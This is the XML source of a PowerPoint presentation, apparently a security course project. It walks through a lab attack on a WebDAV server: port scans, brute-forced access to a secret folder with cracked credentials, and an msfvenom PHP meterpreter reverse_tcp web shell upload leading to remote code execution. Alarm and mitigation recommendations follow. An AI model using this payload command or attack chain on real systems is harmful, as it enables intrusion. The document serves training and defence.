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  <p:embeddedFont>
      <p:font typeface="Roboto Thin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4E714A-B563-4812-BFBB-A51F81A19DF5}">
  <a:tblStyle styleId="{184E714A-B563-4812-BFBB-A51F81A19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8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Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137" name="Google Shape;1137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meterpreter to connect to the uploaded web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the shell to explore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used the remote code execution to open a meterpreter shell to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full file system was then explored and the flag was captured.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8" name="Google Shape;114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9" name="Google Shape;114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3" name="Google Shape;11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825" y="1442875"/>
            <a:ext cx="258350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562" y="3874000"/>
            <a:ext cx="2990725" cy="67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1" name="Google Shape;1161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7" name="Google Shape;1167;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330875" y="1378925"/>
            <a:ext cx="8409300" cy="34509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65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911975" y="675975"/>
            <a:ext cx="7710900" cy="768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 May 4, 2021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 9,966 from 192.168.1.8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 401 response (unauthorized)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1169" name="Google Shape;11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00" y="8946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700" y="1444575"/>
            <a:ext cx="6856634" cy="1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713" y="3169275"/>
            <a:ext cx="6904583" cy="15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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60925" y="1593900"/>
            <a:ext cx="8964000" cy="29160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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868200" y="741300"/>
            <a:ext cx="8586000" cy="645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 On May 4, 2021, 9,966 requests were made.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  company_folder/secret_folder, webdav/shell.php, webdav, webdav/passwd.dav - contained password to access files via web browser</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;11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8" y="2033750"/>
            <a:ext cx="8823975" cy="20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7" name="Google Shape;1187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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102150" y="1502925"/>
            <a:ext cx="8900700" cy="32757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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875500" y="741300"/>
            <a:ext cx="81567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 There were 9,966 requests made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discovered the password?  The shell was accessed 39 times and there were 2 successful requests.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;11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75" y="1948725"/>
            <a:ext cx="494163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475" y="1948725"/>
            <a:ext cx="36957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8" name="Google Shape;1198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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875500" y="741300"/>
            <a:ext cx="79011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secret_folder was requested 9,966 times  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 shell.php file was requested 39 times</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;12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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="60925" y="1593900"/>
            <a:ext cx="8964000" cy="29160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2" name="Google Shape;120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8" y="2033750"/>
            <a:ext cx="8823975" cy="20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9" name="Google Shape;1209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5" name="Google Shape;1215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could look at the number of requests per second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should have the alarm activate if an IP address sends more than 15 requests per second over a 10 second period</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217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Enable only the traffic needed to access internal hosts and deny everything else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Especially for tcp 80 for HTTP requests and ICMP for ping requests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23" name="Google Shape;1223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allow authorized IP addresses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Trip an alarm if an IP not on the allowed IP address list attempts to connect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threshold, if the incoming IP is not allowed, the alarm is tripped.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Access to sensitive files should be restricted to specific users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file(s) should be encrypted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Files can be marked as hidden by putting a “.” as the first character in the file.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1" name="Google Shape;1231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to detect the number of requests per second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we receive more than 50 requests per second for a period of 10 seconds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33" name="Google Shape;1233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failed login attempts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root inaccessible via SSH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Close port 80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two factor authorization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logins to a specific IP address or range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unique login URL’s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9" name="Google Shape;1239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can monitor the connection with Filebeat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an alarm on any read on the files in webdav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threshold - if it is accessed by unauthorized ip addresses, fire it off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1" name="Google Shape;1241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up and configure Filebeat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sure site is on the HTTPS schema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Restrict access based on UID’s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Restrict access based on groups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Restrict write access to DAV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7" name="Google Shape;1247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should be triggered anytime a disallowable file type is requested - such as .php.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alarm should trigger anytime a user uploads a disallowable file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9" name="Google Shape;1249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File type verification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Restrict specific file extensions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Malware prevention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Remove embedded threats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authentication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Store files in an external directory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simple error messages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255.0.0.0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80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Attacker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Microsoft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Target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Microsoft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910475"/>
            <a:ext cx="6699601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8" name="Google Shape;1068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{184E714A-B563-4812-BFBB-A51F81A19DF5}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- Attacker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msrpc 135 tcp open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vmrdp 2179 tcp open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ms-wbt-server 3389 tcp open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- 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22 tcp open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wap-wsp 9200 tcp open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- Target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7EF6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highlight>
                          <a:srgbClr val="F7EF6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22 tcp open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7EF6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80 tcp open</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="F7EF6A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{184E714A-B563-4812-BFBB-A51F81A19DF5}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Sensitive Data Exposure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OWASP #3 - Critical</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/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secret_folder is accessible online but is intended for authorized personnel only.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/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Compromises credentials that attackers can use to break into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able to upload files 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attackers to upload php scripts.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via Command Injection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#1 - Critical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use php scripts to execute shell commands.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attackers to open a reverse shell.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</a:t>
            </a:r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scanned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Ability to explore browser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secret_folder directory was revealed in the exploit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directory was password protected but access was gained by brute force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User is ashton, password is leopoldo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4011850"/>
            <a:ext cx="59436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850" y="2669225"/>
            <a:ext cx="2924151" cy="126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684" y="1459813"/>
            <a:ext cx="2312490" cy="11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</a:t>
            </a:r>
            <a:endParaRPr/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Cracked stolen credentials to connect to webdav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Generate custom web shell with msfconsole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Upload the shell via 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8" name="Google Shape;1118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Uploaded a web shell allowing the attacker to execute shell commands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Attacker ran meterpreter to open a connection to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</a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=1234 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1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1" name="Google Shape;11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313" y="2514600"/>
            <a:ext cx="2562225" cy="174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1159</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>212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Thin</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Medium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Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Exploitation: Unauthorized File Upload</vt:lpstr>
      <vt:lpstr>Exploitation: Remote Code Execution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Kris Lautenschlager</dc:creator>
  <cp:lastModifiedBy>Kris Lautenschlager</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-22T14:37:08Z</dcterms:modified>
</cp:coreProperties>
</file>